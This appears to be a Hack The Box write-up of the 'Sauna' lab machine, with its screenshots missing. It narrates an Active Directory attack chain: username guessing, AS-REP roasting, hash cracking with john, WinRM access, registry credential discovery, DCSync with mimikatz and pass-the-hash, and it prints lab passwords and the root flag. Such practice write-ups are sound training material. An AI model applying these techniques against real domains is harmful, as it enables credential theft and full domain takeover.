Sauna - 10.10.10.

175
by ​SirBroccoli ​(Please give “​respect​” in ​www.hackthebox.eu/home/users/profile/57519​)

Enumeration
I used the tool ​legion​ to automate the enumeration process:

The most interesting ports open were: ​HTTP(80), Kerberos(88) and Win-RM (5985)​.
User
Using ​legion​ again I enumerated the Ldap port:

A lot of information was returned, but the most interesting part was:

Now we have a possible username: “​Hugo Smith​”.

If you try to ​ASREPRoast ​that user you will find that it doesn’t exist. So I tried variations of
the name and found one that was indeed a valid user: ​hsmith​.

Variations I tried:
Hugo Smith
HugoSmith
hugo.smith
h.smith
hsmith
smithh
smith.h
smith.hugo
smithhugo
smith hugo
Found user:

So, now we have a valid user “​hsmith​” but no password…

It’s time to take a look to the web server. In there you will only find a few html pages, some
of them contains interesting names:

So, that we know the format that is being used to create the usernames, let's check this
usernames:
 fsmith
scoins
sdriver
btaylor
hbear

We found that the user “​fsmith​” is vulnerable to ​ASREProast ​and we have obtained the
crackable “hash”.
So, let's crack it with john and rockyou:

Credentials found:​ fsmith:Thestrokes23

Now, just connect via Win-RM and grab the user flag:
Root
I started enumerating the box using​ ​WinPEAS​. It found some interesting credentials inside
the Winlogon registry:

There isn’t any user called “​svc_loanmanager​” but there is one called “​svc_loanmgr​”:

svc_loanmgr​:​Moneymakestheworldgoround!

And you can connect to it with the password extracted from the registry:

You can also use Sharphound to enumerate the Domain and you will find that the user
svc_loanmgr ​has permissions to execute ​DCSync ​against the DC:

Lets abuse this privileges using mimikatz and extract the hash of the Administrator user:
Finally you can use the ​hash ​to ​connect ​as ​Administrator ​to the victim using ​evil-winrm:

root.txt: f3ee04965c68257382e31502cc5e881f